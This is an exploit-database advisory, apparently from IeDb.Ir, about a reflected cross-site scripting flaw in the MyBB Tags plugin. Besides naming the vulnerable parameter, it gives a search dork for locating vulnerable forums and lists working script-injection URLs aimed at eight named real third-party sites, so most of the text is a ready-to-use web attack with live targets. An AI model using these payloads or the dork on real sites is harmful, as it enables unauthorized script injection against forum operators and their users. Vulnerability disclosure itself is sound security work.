The MyBB Tags plugin in versions 1.6.x and 1.8.x suffer from a cross site scripting vulnerability.
783c17771031ace8f378c51439933fa7273399c5ced807f690ed4268973cd08a
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# Mybb Tags Plugin Cross-Site Scripting Vulnerability
# Version Tag Plugin : 1.*
# Vulnerable: 1.6.* and 1.8.*
# Vendor site : https://mods.mybb.com/view/tag-system
# Dork : "MyBB, © 2002-2016" + inurl:tags.php?tag=
# Author : IeDb.Ir
# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir
# Vulnerability attack information site : http://xssed.Ir/
#####################################
Bug :
http://www.site.com/mybb/tags.php?tag=[Xss]
Dem0 :
http://mybbskin.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forum.woc.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.lawwiki.ir/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.andysheh.com/talar/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://stertixforum.altervista.org/tags.php?tag=mybb"><script>alert(/IeDb.Ir/)</script>
http://bmw-diag.pl/tags.php?tag=ZUSB"><script>alert(/IeDb.Ir/)</script>
http://www.englishlearner.info/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forumszklarskaporeba.pl/tags.php?tag=T%C5%82usty%3Cinput%20onfocus=alert%281%29%20autofocus%3E
#####################################
# Archive Exploit = http://iedb.ir/exploits-4982.html
#####################################